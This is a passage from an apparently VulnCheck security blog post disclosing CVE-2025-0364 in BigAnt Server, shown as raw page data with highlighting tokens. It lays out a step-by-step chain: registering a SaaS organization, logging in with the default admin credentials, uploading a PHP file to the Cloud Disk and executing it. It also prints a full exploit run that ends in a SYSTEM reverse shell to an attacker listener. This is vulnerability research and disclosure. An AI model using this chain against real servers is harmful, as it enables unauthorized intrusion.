\u002F>\u003C\u002F",[1373,52282,48974],{"class":6300},[1373,52284,6765],{"class":1383},[1373,52286,52287,52289,52291],{"class":1375,"line":7615},[1373,52288,11852],{"class":1383},[1373,52290,20718],{"class":6300},[1373,52292,6765],{"class":1383},[1373,52294,52295,52297,52299,52301,52303,52305,52307,52309],{"class":1375,"line":7635},[1373,52296,11852],{"class":1383},[1373,52298,46588],{"class":6300},[1373,52300,27205],{"class":8252},[1373,52302,5417],{"class":1383},[1373,52304,183],{"class":1387},[1373,52306,51989],{"class":1391},[1373,52308,183],{"class":1387},[1373,52310,6765],{"class":1383},[1373,52312,52313,52315,52317,52319,52322,52324,52326],{"class":1375,"line":7640},[1373,52314,11852],{"class":1383},[1373,52316,1920],{"class":6300},[1373,52318,5384],{"class":1383},[1373,52320,52321],{"class":4640},":)",[1373,52323,46627],{"class":1383},[1373,52325,1920],{"class":6300},[1373,52327,6765],{"class":1383},[1373,52329,52330,52332,52334,52336,52338,52340,52342,52344,52346,52349,52351,52353],{"class":1375,"line":7648},[1373,52331,11852],{"class":1383},[1373,52333,18],{"class":6300},[1373,52335,27205],{"class":8252},[1373,52337,5417],{"class":1383},[1373,52339,183],{"class":1387},[1373,52341,16142],{"class":1391},[1373,52343,183],{"class":1387},[1373,52345,5384],{"class":1383},[1373,52347,52348],{"class":4640},"Activate 
successfully",[1373,52350,46627],{"class":1383},[1373,52352,18],{"class":6300},[1373,52354,6765],{"class":1383},[1373,52356,52357,52359,52361,52363,52365,52367,52369,52371,52373,52375],{"class":1375,"line":7672},[1373,52358,11852],{"class":1383},[1373,52360,18],{"class":6300},[1373,52362,27205],{"class":8252},[1373,52364,5417],{"class":1383},[1373,52366,183],{"class":1387},[1373,52368,52173],{"class":1391},[1373,52370,183],{"class":1387},[1373,52372,49120],{"class":1383},[1373,52374,18],{"class":6300},[1373,52376,6765],{"class":1383},[1373,52378,52379,52381,52383,52385,52387,52389,52391,52393],{"class":1375,"line":7688},[1373,52380,11852],{"class":1383},[1373,52382,18],{"class":6300},[1373,52384,27205],{"class":8252},[1373,52386,5417],{"class":1383},[1373,52388,183],{"class":1387},[1373,52390,52079],{"class":1391},[1373,52392,183],{"class":1387},[1373,52394,6765],{"class":1383},[18,52396,52397],{},"We now have an activated SaaS org and the information on how to authenticate to the system. In order to actually do this and to see what we can do post-authentication, we need to first find where to use these credentials.",[61,52399,52401],{"id":52400},"cloud-drive-authentication-just-upload-php-i-guess","\"Cloud Drive\" Authentication & Just Upload PHP I Guess",[18,52403,52404,52405,52408],{},"Using the data from the first initial crawl for unauthenticated pages we quickly identified that ",[886,52406,52407],{},"\u002Findex.php\u002FAddin\u002Flogin\u002Findex.html"," would provide an authentication page requesting the company code, username, and password:",[18,52410,52411],{},[68,52412],{"alt":52413,"src":52414,":width":10862},"BigAnt Addin login page with data that was utilized to register the SaaS organization","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-6-saas-login.png",[18,52416,52417,52418,52421,52422,52424,52425,52428,52429,52432,52433,52436],{},"The only information that we didn't submit in the initial registration was the username. 
A quick cross-reference in the database with the newly created SaaS organization in ",[886,52419,52420],{},"antdbms_aaa"," shows that the username that gets created is ",[886,52423,5800],{}," (shocking). A quick submission with ",[886,52426,52427],{},"aaa"," as the company code and ",[886,52430,52431],{},"admin:123456"," as the credentials, and we land on ",[886,52434,52435],{},"\u002Findex.php\u002Faddin\u002Fpublic\u002Fload\u002Fclientid\u002F1.html",", which provides the following page:",[18,52438,52439],{},[68,52440],{"alt":52441,"src":52442,":width":10862},"BigAnt post-authentication landing page for the add-in section. A Cloud Disk button and a Bulletin button are visible","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-8-saas-login-landing.png",[18,52444,52445],{},"We have officially confirmed and validated authentication. Rather than going straight for the SQL injection in the original CVE, it is worth looking around first: the \"Cloud Disk\" is intriguing and didn't match much of the code I'd seen used in the rest of the application. Let's see what happens when we go to the Cloud Disk:",[18,52447,52448],{},[68,52449],{"alt":52450,"src":52451,":width":10862},"BigAnt Cloud Disk page displaying cloud disk filesystem icons","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-9-saas-login-cloud-drive.png",[18,52453,52454],{},"Clicking on the Personal Cloud Disk link in the Drive page immediately leads us to the following page:",[18,52456,52457],{},[68,52458],{"alt":52459,"src":52460,":width":10862},"BigAnt Cloud Disk file upload page","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-10-saas-cloud-drive-upload-page.png",[18,52462,52463],{},"Oh goodie, an upload page. We are building a tower, but entirely made out of red flags.",[18,52465,52466],{},"If you immediately started thinking of MIME type sniffing bypasses or extension tricks on Windows related to recent disclosures, I applaud you, but you might be overthinking it. 
Let's just try and upload some PHP:",[1354,52468,52470],{"className":1367,"code":52469,"language":1369,"meta":219,"style":219},"\u003C?php echo \"oh no...\"; ?>\n",[886,52471,52472],{"__ignoreMap":219},[1373,52473,52474,52476,52478,52480,52482,52485,52487,52489],{"class":1375,"line":1376},[1373,52475,2323],{"class":1397},[1373,52477,1369],{"class":2326},[1373,52479,2329],{"class":1379},[1373,52481,4883],{"class":1387},[1373,52483,52484],{"class":1391},"oh no...",[1373,52486,183],{"class":1387},[1373,52488,39663],{"class":1383},[1373,52490,2347],{"class":1397},[18,52492,52493],{},"The application happily accepts our hard-fought PHP file and presents the uploaded file back to us:",[18,52495,52496],{},[68,52497],{"alt":52498,"src":52499,":width":10862},"BigAnt Cloud Disk successfully uploading PHP file","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-12-saas-cloud-drive-upload-php.png",[18,52501,52502,52503,52506],{},"The preview options and other interaction pages will not work, but the HTML references the page just fine at ",[886,52504,52505],{},"\u002Fdata\u002FCB1E3E2E-58C5-0CB6-BD29-397DF76AB254\u002Fpan\u002FC65DC0F8-E4E8-8FB2-E345-6C53ABCE8D03\u002F2025-02-21\u002Fpwn.php",", so we open the file and cross the finish line:",[18,52508,52509],{},[68,52510],{"alt":52511,"src":52512},"BigAnt PHP file execution","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-13-saas-cloud-drive-php-exec.png",[18,52514,52515],{},"Sometimes the silliest things work the best. We officially have a full exploit chain to go from no authentication to arbitrary PHP execution. 
Let's automate and mature it into an exploit.",[61,52517,52519],{"id":52518},"automation-with-go-exploit","Automation with go-exploit",[18,52521,52522],{},"In summary, the vulnerability requires the following HTTP requests to achieve full code execution:",[1789,52524,52525,52528,52531,52534,52541,52544,52547,52553,52560,52563],{},[25,52526,52527],{},"Get the CAPTCHA and CSRF tokens.",[25,52529,52530],{},"Solve the CAPTCHA manually.",[25,52532,52533],{},"Register a new SaaS organization with the CAPTCHA and CSRF tokens from steps 1 and 2, together with the registration settings.",[25,52535,52536,52537,52540],{},"In a new session, request the login page with a ",[886,52538,52539],{},"saas="," cookie set to the new organization from step 3; this binds the new session to the SaaS instance the attacker just registered.",[25,52542,52543],{},"Use the session cookie from step 4 to request the demo page that displays the SaaS UUID. This requires the bound SaaS session; otherwise the application binds the session to the default SaaS organization, which is not known to the attacker.",[25,52545,52546],{},"Activate the registered organization with the SaaS UUID acquired in step 5.",[25,52548,52549,52550,52552],{},"Authenticate to the \"Cloud Drive\" page with the ",[886,52551,5800],{}," account of the organization and the attacker-controlled registration data.",[25,52554,52555,52556,52559],{},"Get the Cloud Drive root IDs, UUIDs, date in ",[886,52557,52558],{},"YYYY-MM-DD"," format, and path information in order to know where the file is accessible.",[25,52561,52562],{},"Upload a PHP payload, noting the paths and upload dates.",[25,52564,52565],{},"Trigger the PHP shell via the noted paths without authentication.",[18,52567,52568,52569,52572,52573],{},"This is the perfect opportunity to use ",[47,52570,20558],{"href":14297,"rel":52571},[51]," to create a small self-contained exploit. All said and done, the exploit was only roughly 350 lines of code. 
The framework is the exact same system that the VulnCheck Initial Access Intelligence team uses to quickly create self-contained and mature exploits, and we are giving out our copy of CVE-2025-0364 to show off how well it works for situations like this: ",[47,52574,45540],{"href":45540,"rel":52575},[51],[18,52577,52578],{},"For the moment of truth, retrieve the CAPTCHA and pre-conditions for the exploit:",[1354,52580,52582],{"className":2195,"code":52581,"language":2197,"meta":219,"style":219},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364 $ .\u002Fbuild\u002Fcve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -v -c -e\ntime=2025-01-09T14:49:56.227-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.104 port=8000 ssl=false \"ssl auto\"=false\ntime=2025-01-09T14:49:56.227-07:00 level=STATUS msg=\"Validating Bigantsoft Bigant Server target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:49:56.272-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.104 port=8000 verified=true\ntime=2025-01-09T14:49:56.272-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:49:56.301-07:00 level=VERSION msg=\"The reported version is 5.6.06\" host=10.0.0.104 port=8000 version=5.6.06\ntime=2025-01-09T14:49:56.301-07:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.0.0.104 port=8000 vulnerable=yes\ntime=2025-01-09T14:49:56.301-07:00 level=STATUS msg=\"CAPTCHA flags not set, retrieving captcha-hash\"\ntime=2025-01-09T14:49:56.317-07:00 level=STATUS msg=\"Open the following page in a browser and solve the CAPTCHA: http:\u002F\u002F10.0.0.104:8000\u002Findex.php\u002FHome\u002FPublic\u002Fverify\"\ntime=2025-01-09T14:49:56.317-07:00 level=STATUS msg=\"Solve CAPTCHA and pass the following flags to this exploit: `-captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb 
-captcha \u003CSOLVED CAPTCHA>`\"\n",[886,52583,52584,52607,52664,52700,52743,52779,52822,52864,52889,52915],{"__ignoreMap":219},[1373,52585,52586,52588,52590,52592,52594,52596,52598,52600,52602,52604],{"class":1375,"line":1376},[1373,52587,45554],{"class":2206},[1373,52589,45557],{"class":4640},[1373,52591,45560],{"class":1391},[1373,52593,38910],{"class":2209},[1373,52595,45565],{"class":5467},[1373,52597,45568],{"class":2209},[1373,52599,45571],{"class":5467},[1373,52601,45584],{"class":2209},[1373,52603,45587],{"class":2209},[1373,52605,52606],{"class":2209}," -e\n",[1373,52608,52609,52611,52613,52616,52618,52620,52622,52624,52626,52628,52630,52632,52634,52636,52638,52640,52642,52644,52646,52648,52650,52652,52654,52656,52658,52660,52662],{"class":1375,"line":220},[1373,52610,38930],{"class":4640},[1373,52612,5417],{"class":1397},[1373,52614,52615],{"class":1391},"2025-01-09T14:49:56.227-07:00",[1373,52617,38938],{"class":4640},[1373,52619,5417],{"class":1397},[1373,52621,38943],{"class":1391},[1373,52623,38946],{"class":4640},[1373,52625,5417],{"class":1397},[1373,52627,183],{"class":1387},[1373,52629,38979],{"class":1391},[1373,52631,183],{"class":1387},[1373,52633,38984],{"class":4640},[1373,52635,5417],{"class":1397},[1373,52637,445],{"class":1391},[1373,52639,38991],{"class":4640},[1373,52641,5417],{"class":1397},[1373,52643,45696],{"class":1391},[1373,52645,38999],{"class":4640},[1373,52647,5417],{"class":1397},[1373,52649,45703],{"class":1391},[1373,52651,39007],{"class":4640},[1373,52653,5417],{"class":1397},[1373,52655,5971],{"class":1391},[1373,52657,4883],{"class":1387},[1373,52659,39016],{"class":1391},[1373,52661,183],{"class":1387},[1373,52663,39021],{"class":1391},[1373,52665,52666,52668,52670,52672,52674,52676,52678,52680,52682,52684,52686,52688,52690,52692,52694,52696,52698],{"class":1375,"line":1266},[1373,52667,38930],{"class":4640},[1373,52669,5417],{"class":1397},[1373,52671,52615],{"class":1391},[1373,52673,38938],{"class":4640},[1373,52675,
5417],{"class":1397},[1373,52677,38943],{"class":1391},[1373,52679,38946],{"class":4640},[1373,52681,5417],{"class":1397},[1373,52683,183],{"class":1387},[1373,52685,45740],{"class":1391},[1373,52687,183],{"class":1387},[1373,52689,38991],{"class":4640},[1373,52691,5417],{"class":1397},[1373,52693,45696],{"class":1391},[1373,52695,38999],{"class":4640},[1373,52697,5417],{"class":1397},[1373,52699,45755],{"class":1391},[1373,52701,52702,52704,52706,52709,52711,52713,52715,52717,52719,52721,52723,52725,52727,52729,52731,52733,52735,52737,52739,52741],{"class":1375,"line":1852},[1373,52703,38930],{"class":4640},[1373,52705,5417],{"class":1397},[1373,52707,52708],{"class":1391},"2025-01-09T14:49:56.272-07:00",[1373,52710,38938],{"class":4640},[1373,52712,5417],{"class":1397},[1373,52714,39062],{"class":1391},[1373,52716,38946],{"class":4640},[1373,52718,5417],{"class":1397},[1373,52720,183],{"class":1387},[1373,52722,45779],{"class":1391},[1373,52724,183],{"class":1387},[1373,52726,38991],{"class":4640},[1373,52728,5417],{"class":1397},[1373,52730,45696],{"class":1391},[1373,52732,38999],{"class":4640},[1373,52734,5417],{"class":1397},[1373,52736,45703],{"class":1391},[1373,52738,45796],{"class":4640},[1373,52740,5417],{"class":1397},[1373,52742,45801],{"class":1391},[1373,52744,52745,52747,52749,52751,52753,52755,52757,52759,52761,52763,52765,52767,52769,52771,52773,52775,52777],{"class":1375,"line":4692},[1373,52746,38930],{"class":4640},[1373,52748,5417],{"class":1397},[1373,52750,52708],{"class":1391},[1373,52752,38938],{"class":4640},[1373,52754,5417],{"class":1397},[1373,52756,38943],{"class":1391},[1373,52758,38946],{"class":4640},[1373,52760,5417],{"class":1397},[1373,52762,183],{"class":1387},[1373,52764,45824],{"class":1391},[1373,52766,183],{"class":1387},[1373,52768,38991],{"class":4640},[1373,52770,5417],{"class":1397},[1373,52772,45696],{"class":1391},[1373,52774,38999],{"class":4640},[1373,52776,5417],{"class":1397},[1373,52778,45755],{"class":1391},[1373
,52780,52781,52783,52785,52788,52790,52792,52794,52796,52798,52800,52802,52804,52806,52808,52810,52812,52814,52816,52818,52820],{"class":1375,"line":4724},[1373,52782,38930],{"class":4640},[1373,52784,5417],{"class":1397},[1373,52786,52787],{"class":1391},"2025-01-09T14:49:56.301-07:00",[1373,52789,38938],{"class":4640},[1373,52791,5417],{"class":1397},[1373,52793,45854],{"class":1391},[1373,52795,38946],{"class":4640},[1373,52797,5417],{"class":1397},[1373,52799,183],{"class":1387},[1373,52801,45863],{"class":1391},[1373,52803,183],{"class":1387},[1373,52805,38991],{"class":4640},[1373,52807,5417],{"class":1397},[1373,52809,45696],{"class":1391},[1373,52811,38999],{"class":4640},[1373,52813,5417],{"class":1397},[1373,52815,45703],{"class":1391},[1373,52817,45880],{"class":4640},[1373,52819,5417],{"class":1397},[1373,52821,45885],{"class":1391},[1373,52823,52824,52826,52828,52830,52832,52834,52836,52838,52840,52842,52844,52846,52848,52850,52852,52854,52856,52858,52860,52862],{"class":1375,"line":4756},[1373,52825,38930],{"class":4640},[1373,52827,5417],{"class":1397},[1373,52829,52787],{"class":1391},[1373,52831,38938],{"class":4640},[1373,52833,5417],{"class":1397},[1373,52835,39062],{"class":1391},[1373,52837,38946],{"class":4640},[1373,52839,5417],{"class":1397},[1373,52841,183],{"class":1387},[1373,52843,45908],{"class":1391},[1373,52845,183],{"class":1387},[1373,52847,38991],{"class":4640},[1373,52849,5417],{"class":1397},[1373,52851,45696],{"class":1391},[1373,52853,38999],{"class":4640},[1373,52855,5417],{"class":1397},[1373,52857,45703],{"class":1391},[1373,52859,45925],{"class":4640},[1373,52861,5417],{"class":1397},[1373,52863,45930],{"class":1391},[1373,52865,52866,52868,52870,52872,52874,52876,52878,52880,52882,52884,52887],{"class":1375,"line":4768},[1373,52867,38930],{"class":4640},[1373,52869,5417],{"class":1397},[1373,52871,52787],{"class":1391},[1373,52873,38938],{"class":4640},[1373,52875,5417],{"class":1397},[1373,52877,38943],{"class":1391},[1373
,52879,38946],{"class":4640},[1373,52881,5417],{"class":1397},[1373,52883,183],{"class":1387},[1373,52885,52886],{"class":1391},"CAPTCHA flags not set, retrieving captcha-hash",[1373,52888,19057],{"class":1387},[1373,52890,52891,52893,52895,52898,52900,52902,52904,52906,52908,52910,52913],{"class":1375,"line":4792},[1373,52892,38930],{"class":4640},[1373,52894,5417],{"class":1397},[1373,52896,52897],{"class":1391},"2025-01-09T14:49:56.317-07:00",[1373,52899,38938],{"class":4640},[1373,52901,5417],{"class":1397},[1373,52903,38943],{"class":1391},[1373,52905,38946],{"class":4640},[1373,52907,5417],{"class":1397},[1373,52909,183],{"class":1387},[1373,52911,52912],{"class":1391},"Open the following page in a browser and solve the CAPTCHA: http:\u002F\u002F10.0.0.104:8000\u002Findex.php\u002FHome\u002FPublic\u002Fverify",[1373,52914,19057],{"class":1387},[1373,52916,52917,52919,52921,52923,52925,52927,52929,52931,52933,52935,52938,52940,52943,52946,52949,52952,52955,52957,52960,52962],{"class":1375,"line":4798},[1373,52918,38930],{"class":4640},[1373,52920,5417],{"class":1397},[1373,52922,52897],{"class":1391},[1373,52924,38938],{"class":4640},[1373,52926,5417],{"class":1397},[1373,52928,38943],{"class":1391},[1373,52930,38946],{"class":4640},[1373,52932,5417],{"class":1397},[1373,52934,183],{"class":1387},[1373,52936,52937],{"class":1391},"Solve CAPTCHA and pass the following flags to this exploit: ",[1373,52939,19169],{"class":1387},[1373,52941,52942],{"class":2206},"-captcha-hash",[1373,52944,52945],{"class":1391}," 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 ",[1373,52947,52948],{"class":2209},"-captcha-session",[1373,52950,52951],{"class":1391}," 4fbsn0i6bdiuu6vuik99gbhndb ",[1373,52953,52954],{"class":2209},"-captcha",[1373,52956,27250],{"class":1397},[1373,52958,52959],{"class":1391},"SOLVED CAPTCHA",[1373,52961,5384],{"class":1397},[1373,52963,52964],{"class":1387},"`\"\n",[18,52966,52967,52968,52971],{},"Solve the CAPTCHA and fire away to 
get a good ol' ",[886,52969,52970],{},"NT AUTHORITY\\SYSTEM"," reverse shell:",[1354,52973,52975],{"className":31740,"code":52974,"language":2186,"meta":219,"style":219},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364 $ .\u002Fbuild\u002Fcve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -lhost 10.0.1.10 -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6\ntime=2025-01-09T14:50:18.502-07:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.104 port=8000 ssl=false \"ssl auto\"=false\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Validating Bigantsoft Bigant Server target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.104 port=8000 verified=true\ntime=2025-01-09T14:50:18.620-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.650-07:00 level=VERSION msg=\"The reported version is 5.6.06\" host=10.0.0.104 port=8000 version=5.6.06\ntime=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.0.0.104 port=8000 vulnerable=yes\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Password that will be used for authentication: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Registering SaaS org: LBJCUE (mpzo@fldlmarv.com) with password: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.675-07:00 level=STATUS msg=\"Getting new PHP session and pinning the SaaS org to the session\"\ntime=2025-01-09T14:50:18.747-07:00 level=STATUS msg=\"Retrieving org SSID from demo page with session 
v1cir7mh9v4dfv4ik54mhq6so0\"\ntime=2025-01-09T14:50:18.764-07:00 level=STATUS msg=\"Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3\"\ntime=2025-01-09T14:50:18.765-07:00 level=STATUS msg=\"Activating SaaS organization\"\ntime=2025-01-09T14:50:22.627-07:00 level=STATUS msg=\"Authenticating to the addin SaaS admin\"\ntime=2025-01-09T14:50:22.673-07:00 level=STATUS msg=\"Visiting SaaS addin cloud drive page\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Attempting to upload `JQsaYCKEOu.php` to cloud drive addin\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Attempting to trigger final payload, timeout is expected after callback\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Requesting final payload at: http:\u002F\u002F10.0.0.104:8000\u002Fdata\u002F387360F0-EECD-622B-5B90-C37F2BBD45B3\u002Fpan\u002F99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\u002F2025-01-09\u002FJQsaYCKEOu.php\"\ntime=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.104:51690\"\ntime=2025-01-09T14:50:22.821-07:00 level=STATUS msg=\"Active shell from 10.0.0.104:51690\"\nMicrosoft Windows [Version 10.0.17763.107]\n(c) 2018 Microsoft Corporation. 
All rights reserved.\n\nC:\\Program Files (x86)\\BigAntSoft\\IM Console\\im_webserver\\htdocs\\data\\387360F0-EECD-622B-5B90-C37F2BBD45B3\\pan\\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\\2025-01-09>whoami\nwhoami\nnt authority\\system\n\nC:\\Program Files (x86)\\BigAntSoft\\IM Console\\im_webserver\\htdocs\\data\\387360F0-EECD-622B-5B90-C37F2BBD45B3\\pan\\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\\2025-01-09>^C\n",[886,52976,52977,53019,53043,53067,53123,53159,53201,53237,53279,53321,53345,53369,53393,53417,53441,53465,53489,53513,53537,53569,53593,53617,53641,53665,53675,53695,53699,53747,53751,53761,53765],{"__ignoreMap":219},[1373,52978,52979,52981,52983,52985,52987,52989,52991,52993,52995,52997,52999,53001,53003,53005,53007,53009,53011,53013,53015,53017],{"class":1375,"line":1376},[1373,52980,45554],{"class":2206},[1373,52982,45557],{"class":4640},[1373,52984,45560],{"class":1391},[1373,52986,38910],{"class":2209},[1373,52988,45565],{"class":5467},[1373,52990,45568],{"class":2209},[1373,52992,45571],{"class":5467},[1373,52994,38916],{"class":2209},[1373,52996,45576],{"class":5467},[1373,52998,38922],{"class":2209},[1373,53000,45581],{"class":5467},[1373,53002,45584],{"class":2209},[1373,53004,45587],{"class":2209},[1373,53006,38907],{"class":2209},[1373,53008,45592],{"class":2209},[1373,53010,45595],{"class":1391},[1373,53012,45598],{"class":2209},[1373,53014,45601],{"class":1391},[1373,53016,45604],{"class":2209},[1373,53018,45607],{"class":1391},[1373,53020,53021,53023,53025,53027,53029,53031,53033,53035,53037,53039,53041],{"class":1375,"line":220},[1373,53022,38930],{"class":4640},[1373,53024,5417],{"class":1397},[1373,53026,45616],{"class":1391},[1373,53028,38938],{"class":4640},[1373,53030,5417],{"class":1397},[1373,53032,38943],{"class":1391},[1373,53034,38946],{"class":4640},[1373,53036,5417],{"class":1397},[1373,53038,183],{"class":1387},[1373,53040,45631],{"class":1391},[1373,53042,19057],{"class":1387},[1373,53044,53045,53047,53049,53051,53053,53055,53057,53059,
53061,53063,53065],{"class":1375,"line":1266},[1373,53046,38930],{"class":4640},[1373,53048,5417],{"class":1397},[1373,53050,45642],{"class":1391},[1373,53052,38938],{"class":4640},[1373,53054,5417],{"class":1397},[1373,53056,38943],{"class":1391},[1373,53058,38946],{"class":4640},[1373,53060,5417],{"class":1397},[1373,53062,183],{"class":1387},[1373,53064,45657],{"class":1391},[1373,53066,19057],{"class":1387},[1373,53068,53069,53071,53073,53075,53077,53079,53081,53083,53085,53087,53089,53091,53093,53095,53097,53099,53101,53103,53105,53107,53109,53111,53113,53115,53117,53119,53121],{"class":1375,"line":1852},[1373,53070,38930],{"class":4640},[1373,53072,5417],{"class":1397},[1373,53074,45642],{"class":1391},[1373,53076,38938],{"class":4640},[1373,53078,5417],{"class":1397},[1373,53080,38943],{"class":1391},[1373,53082,38946],{"class":4640},[1373,53084,5417],{"class":1397},[1373,53086,183],{"class":1387},[1373,53088,38979],{"class":1391},[1373,53090,183],{"class":1387},[1373,53092,38984],{"class":4640},[1373,53094,5417],{"class":1397},[1373,53096,445],{"class":1391},[1373,53098,38991],{"class":4640},[1373,53100,5417],{"class":1397},[1373,53102,45696],{"class":1391},[1373,53104,38999],{"class":4640},[1373,53106,5417],{"class":1397},[1373,53108,45703],{"class":1391},[1373,53110,39007],{"class":4640},[1373,53112,5417],{"class":1397},[1373,53114,5971],{"class":1391},[1373,53116,4883],{"class":1387},[1373,53118,39016],{"class":1391},[1373,53120,183],{"class":1387},[1373,53122,39021],{"class":1391},[1373,53124,53125,53127,53129,53131,53133,53135,53137,53139,53141,53143,53145,53147,53149,53151,53153,53155,53157],{"class":1375,"line":4692},[1373,53126,38930],{"class":4640},[1373,53128,5417],{"class":1397},[1373,53130,45642],{"class":1391},[1373,53132,38938],{"class":4640},[1373,53134,5417],{"class":1397},[1373,53136,38943],{"class":1391},[1373,53138,38946],{"class":4640},[1373,53140,5417],{"class":1397},[1373,53142,183],{"class":1387},[1373,53144,45740],{"class":1391},[1373
,53146,183],{"class":1387},[1373,53148,38991],{"class":4640},[1373,53150,5417],{"class":1397},[1373,53152,45696],{"class":1391},[1373,53154,38999],{"class":4640},[1373,53156,5417],{"class":1397},[1373,53158,45755],{"class":1391},[1373,53160,53161,53163,53165,53167,53169,53171,53173,53175,53177,53179,53181,53183,53185,53187,53189,53191,53193,53195,53197,53199],{"class":1375,"line":4724},[1373,53162,38930],{"class":4640},[1373,53164,5417],{"class":1397},[1373,53166,45764],{"class":1391},[1373,53168,38938],{"class":4640},[1373,53170,5417],{"class":1397},[1373,53172,39062],{"class":1391},[1373,53174,38946],{"class":4640},[1373,53176,5417],{"class":1397},[1373,53178,183],{"class":1387},[1373,53180,45779],{"class":1391},[1373,53182,183],{"class":1387},[1373,53184,38991],{"class":4640},[1373,53186,5417],{"class":1397},[1373,53188,45696],{"class":1391},[1373,53190,38999],{"class":4640},[1373,53192,5417],{"class":1397},[1373,53194,45703],{"class":1391},[1373,53196,45796],{"class":4640},[1373,53198,5417],{"class":1397},[1373,53200,45801],{"class":1391},[1373,53202,53203,53205,53207,53209,53211,53213,53215,53217,53219,53221,53223,53225,53227,53229,53231,53233,53235],{"class":1375,"line":4756},[1373,53204,38930],{"class":4640},[1373,53206,5417],{"class":1397},[1373,53208,45764],{"class":1391},[1373,53210,38938],{"class":4640},[1373,53212,5417],{"class":1397},[1373,53214,38943],{"class":1391},[1373,53216,38946],{"class":4640},[1373,53218,5417],{"class":1397},[1373,53220,183],{"class":1387},[1373,53222,45824],{"class":1391},[1373,53224,183],{"class":1387},[1373,53226,38991],{"class":4640},[1373,53228,5417],{"class":1397},[1373,53230,45696],{"class":1391},[1373,53232,38999],{"class":4640},[1373,53234,5417],{"class":1397},[1373,53236,45755],{"class":1391},[1373,53238,53239,53241,53243,53245,53247,53249,53251,53253,53255,53257,53259,53261,53263,53265,53267,53269,53271,53273,53275,53277],{"class":1375,"line":4768},[1373,53240,38930],{"class":4640},[1373,53242,5417],{"class":1397},[13
73,53244,45847],{"class":1391},[1373,53246,38938],{"class":4640},[1373,53248,5417],{"class":1397},[1373,53250,45854],{"class":1391},[1373,53252,38946],{"class":4640},[1373,53254,5417],{"class":1397},[1373,53256,183],{"class":1387},[1373,53258,45863],{"class":1391},[1373,53260,183],{"class":1387},[1373,53262,38991],{"class":4640},[1373,53264,5417],{"class":1397},[1373,53266,45696],{"class":1391},[1373,53268,38999],{"class":4640},[1373,53270,5417],{"class":1397},[1373,53272,45703],{"class":1391},[1373,53274,45880],{"class":4640},[1373,53276,5417],{"class":1397},[1373,53278,45885],{"class":1391},[1373,53280,53281,53283,53285,53287,53289,53291,53293,53295,53297,53299,53301,53303,53305,53307,53309,53311,53313,53315,53317,53319],{"class":1375,"line":4792},[1373,53282,38930],{"class":4640},[1373,53284,5417],{"class":1397},[1373,53286,45847],{"class":1391},[1373,53288,38938],{"class":4640},[1373,53290,5417],{"class":1397},[1373,53292,39062],{"class":1391},[1373,53294,38946],{"class":4640},[1373,53296,5417],{"class":1397},[1373,53298,183],{"class":1387},[1373,53300,45908],{"class":1391},[1373,53302,183],{"class":1387},[1373,53304,38991],{"class":4640},[1373,53306,5417],{"class":1397},[1373,53308,45696],{"class":1391},[1373,53310,38999],{"class":4640},[1373,53312,5417],{"class":1397},[1373,53314,45703],{"class":1391},[1373,53316,45925],{"class":4640},[1373,53318,5417],{"class":1397},[1373,53320,45930],{"class":1391},[1373,53322,53323,53325,53327,53329,53331,53333,53335,53337,53339,53341,53343],{"class":1375,"line":4798},[1373,53324,38930],{"class":4640},[1373,53326,5417],{"class":1397},[1373,53328,45847],{"class":1391},[1373,53330,38938],{"class":4640},[1373,53332,5417],{"class":1397},[1373,53334,38943],{"class":1391},[1373,53336,38946],{"class":4640},[1373,53338,5417],{"class":1397},[1373,53340,183],{"class":1387},[1373,53342,45953],{"class":1391},[1373,53344,19057],{"class":1387},[1373,53346,53347,53349,53351,53353,53355,53357,53359,53361,53363,53365,53367],{"class":1375,"l
